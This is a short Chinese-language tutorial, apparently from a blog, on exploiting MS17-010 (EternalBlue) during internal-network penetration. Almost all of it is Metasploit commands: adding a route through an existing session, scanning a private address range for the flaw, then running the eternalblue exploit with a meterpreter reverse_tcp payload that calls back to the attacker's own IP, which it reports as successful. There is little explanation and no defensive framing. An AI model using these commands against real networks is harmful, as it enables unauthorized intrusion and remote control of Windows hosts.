内网渗透之ms17-010

时间:2022-07-24
本文章向大家介绍内网渗透之ms17-010,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

前言

在内网渗透时,通常挂上代理后。在内网首先会打啵ms17-010。在实战中,使用msf的ms17-010模块,数次没有反弹成功。基于此,到底如何成功利用ms17-010。

ms17_010_eternalblue模块 在msf成功接收session之后,添加路由

run autoroute -p

使用Metasploit的ms17-010相关的模块进行探测是否存在该漏洞

启动Metasploit

msfconsole
use  auxiliary/scanner/smb/smb_ms17_010
set  rhosts 192.168.2.100-200   
set  threads 3

显示有漏洞

尝试利用漏洞

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.2.165   
set lhost 192.168.2.117   #自己的ip
run

成功

随机文章
本站知识点必读
最近更新